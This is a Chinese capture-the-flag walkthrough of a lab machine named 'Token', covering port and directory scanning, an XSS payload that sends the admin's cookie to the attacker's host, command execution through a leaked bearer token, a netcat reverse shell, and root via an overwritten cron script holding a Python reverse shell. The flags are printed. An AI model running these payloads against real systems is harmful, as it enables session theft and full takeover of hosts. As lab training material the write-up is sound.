Token

靶机说明

QQ群：660930334

一、主机探测

┌──(root㉿kali)-[/miao/maze-sec/token]
└─# nmap -sn 192.168.2.0/24              
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-07-25 09:01 CST
Nmap scan report for 192.168.2.1
Host is up (0.00043s latency).
MAC Address: 0A:00:27:00:00:0A (Unknown)
Nmap scan report for 192.168.2.2
Host is up (0.00034s latency).
MAC Address: 08:00:27:C7:7C:7C (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.2.63
Host is up (0.00094s latency).
MAC Address: 08:00:27:5C:90:A4 (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.2.4
Host is up.
Nmap done: 256 IP addresses (4 hosts up) scanned in 2.04 seconds

靶机IP：192.168.2.63

二、端口扫描

1、全端口扫描

┌──(root㉿kali)-[/miao/maze-sec/token]
└─# nmap --min-rate 10000 -p- 192.168.2.63                           
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-07-25 09:01 CST
Nmap scan report for 192.168.2.63
Host is up (0.00034s latency).
Not shown: 65532 closed tcp ports (reset)
PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
5000/tcp open  upnp
MAC Address: 08:00:27:5C:90:A4 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 3.61 seconds

开放端口：22,80,5000

2、详细信息扫描

┌──(root㉿kali)-[/miao/maze-sec/token]
└─# nmap --min-rate 10000 -sT -sV -sC -O -p22,80,5000 192.168.2.63
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-07-25 09:02 CST
Nmap scan report for 192.168.2.63
Host is up (0.0011s latency).

PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.4p1 Debian 5+deb11u3 (protocol 2.0)
| ssh-hostkey: 
|   3072 f6:a3:b6:78:c4:62:af:44:bb:1a:a0:0c:08:6b:98:f7 (RSA)
|   256 bb:e8:a2:31:d4:05:a9:c9:31:ff:62:f6:32:84:21:9d (ECDSA)
|_  256 3b:ae:34:64:4f:a5:75:b9:4a:b9:81:f9:89:76:99:eb (ED25519)
80/tcp   open  http    Apache httpd 2.4.62 ((Debian))
| http-cookie-flags: 
|   /: 
|     PHPSESSID: 
|_      httponly flag not set
|_http-server-header: Apache/2.4.62 (Debian)
| http-title: \xE7\xAE\xA1\xE7\x90\x86\xE5\x91\x98\xE7\x99\xBB\xE5\xBD\x95
|_Requested resource was login.php
5000/tcp open  upnp?
| fingerprint-strings: 
|   GetRequest: 
|     HTTP/1.1 404 NOT FOUND
|     Server: Werkzeug/3.1.3 Python/3.9.2
|     Date: Fri, 25 Jul 2025 01:02:23 GMT
|     Content-Type: text/html; charset=utf-8
|     Content-Length: 207
|     Connection: close
|     <!doctype html>
|     <html lang=en>
|     <title>404 Not Found</title>
|     <h1>Not Found</h1>
|     <p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>
|   HTTPOptions: 
|     HTTP/1.1 404 NOT FOUND
|     Server: Werkzeug/3.1.3 Python/3.9.2
|     Date: Fri, 25 Jul 2025 01:02:38 GMT
|     Content-Type: text/html; charset=utf-8
|     Content-Length: 207
|     Connection: close
|     <!doctype html>
|     <html lang=en>
|     <title>404 Not Found</title>
|     <h1>Not Found</h1>
|     <p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>
|   Help: 
|     <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
|     "http://www.w3.org/TR/html4/strict.dtd">
|     <html>
|     <head>
|     <meta http-equiv="Content-Type" content="text/html;charset=utf-8">
|     <title>Error response</title>
|     </head>
|     <body>
|     <h1>Error response</h1>
|     <p>Error code: 400</p>
|     <p>Message: Bad request syntax ('HELP').</p>
|     <p>Error code explanation: HTTPStatus.BAD_REQUEST - Bad request syntax or unsupported method.</p>
|     </body>
|     </html>
|   RTSPRequest: 
|     <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
|     "http://www.w3.org/TR/html4/strict.dtd">
|     <html>
|     <head>
|     <meta http-equiv="Content-Type" content="text/html;charset=utf-8">
|     <title>Error response</title>
|     </head>
|     <body>
|     <h1>Error response</h1>
|     <p>Error code: 400</p>
|     <p>Message: Bad request version ('RTSP/1.0').</p>
|     <p>Error code explanation: HTTPStatus.BAD_REQUEST - Bad request syntax or unsupported method.</p>
|     </body>
|_    </html>
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?
....
MAC Address: 08:00:27:5C:90:A4 (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 94.98 seconds

三、WEB渗透

1、80端口

访问80端口，是一个登录页面

1-目录扫描

┌──(root㉿kali)-[/miao/maze-sec/token]
└─# gobuster dir -u http://192.168.2.63 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -x php,txt,html,bak,md,db,js
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.2.63
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Extensions:              bak,md,db,js,php,txt,html
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.php                 (Status: 403) [Size: 277]
/index.php            (Status: 302) [Size: 0] [--> login.php]
/login.php            (Status: 200) [Size: 3484]
/.html                (Status: 403) [Size: 277]
/feedback.php         (Status: 200) [Size: 5008]
/messages.txt         (Status: 200) [Size: 0]
/logout.php           (Status: 302) [Size: 0] [--> login.php]
/dashboard.php        (Status: 302) [Size: 0] [--> login.php]
/.html                (Status: 403) [Size: 277]
/.php                 (Status: 403) [Size: 277]
/server-status        (Status: 403) [Size: 277]
Progress: 1764480 / 1764488 (100.00%)
===============================================================
Finished
===============================================================

找到两个路径feedback.php和messages.txt，进行访问，发现是一个留言页面和保存留言的页面

2-XSS漏洞

查看feedback.php源码，发现提示存在xss漏洞

构造一个xss脚本，获取flask_token

<script>document.location='http://192.168.2.4/cookie_catcher.php?cookie='+document.cookie</script>

flask_token=Authorization: Bearer ADMIN_T0K3N_Flask_Dashazi

2、5000端口

1-目录扫描

┌──(root㉿kali)-[/miao/maze-sec/token]
└─# dirsearch -u "http://192.168.2.63:5000"
Target: http://192.168.2.63:5000/

[14:50:56] Starting: 
[14:51:12] 302 -  199B  - /admin  ->  /login
[14:51:32] 401 -   25B  - /cmd
[14:51:43] 200 -   44B  - /flag
[14:51:54] 200 -  323B  - /login

Task Completed

访问cmd，发现需要认证

┌──(root㉿kali)-[/miao/maze-sec/token]
└─# curl http://192.168.2.63:5000/cmd                                                                                                    
{"error":"Unauthorized"}

2-命令执行

加上获取到flask_token，发现可以执行命令

┌──(root㉿kali)-[/miao/maze-sec/token]
└─# curl "http://192.168.2.63:5000/cmd?cmd=id" -H "Authorization: Bearer ADMIN_T0K3N_Flask_Dashazi" 
{"output":"uid=33(www-data) gid=33(www-data) groups=33(www-data)\n","status":"success"}

四、获取www-data权限

反弹shell

┌──(root㉿kali)-[/miao/maze-sec/token]
└─# curl "http://192.168.2.63:5000/cmd?cmd=busybox%20nc%20192.168.2.4%204444%20-e%20/bin/bash" -H "Authorization: Bearer ADMIN_T0K3N_Flask_Dashazi"

成功获取到shell

┌──(root㉿kali)-[~]
└─# nc -lvnp 4444
listening on [any] 4444 ...
id
connect to [192.168.2.4] from (UNKNOWN) [192.168.2.63] 54420
uid=33(www-data) gid=33(www-data) groups=33(www-data)

USER FLAG

www-data@Token:/home/catalytic$ cat user.txt 
flag{user-caaea73c2af7f9b2391cc15f398b0e74}

五、权限提升

查看以root权限运行的进程

www-data@Token:/home/catalytic$ ps aux | grep root
....
root      687534  0.0  0.0   2472   512 ?        Ss   03:27   0:00 /bin/sh -c /usr/bin/python3  /var/www/html/check_messages_cron/check_messages.py
root      687538  3.8  1.1 107264 24088 ?        Sl   03:27   0:00 /usr/bin/python3 /var/www/html/check_messages_cron/check_messages.py
....
www-data  689354  0.0  0.0   6176   632 pts/0    S+   03:27   0:00 grep root

发现在/var/www/html/check_messages_cron/check_messages.py以root权限运行

www-data@Token:~/html$ ls -la check_messages_cron/check_messages.py 
-rwxr-xr-x 1 www-data www-data 1842 Jul 22 02:03 check_messages_cron/check_messages.py

修改文件check_messages.py的内容

echo'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.2.4",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);' > /var/www/html/check_messages_cron/check_messages.py

等待定时任务执行

┌──(root㉿kali)-[~]
└─# nc -lvnp 4444
listening on [any] 4444 ...
id
connect to [192.168.2.4] from (UNKNOWN) [192.168.2.63] 60762
bash: cannot set terminal process group (1002175): Inappropriate ioctl for device
bash: no job control in this shell
root@Token:~# id
uid=0(root) gid=0(root) groups=0(root)
root@Token:~# id
id
uid=0(root) gid=0(root) groups=0(root)

ROOT FLAG

root@Token:~# cat root.txt
flag{root-d404401c8c6495b206fc35c95e55a6d5}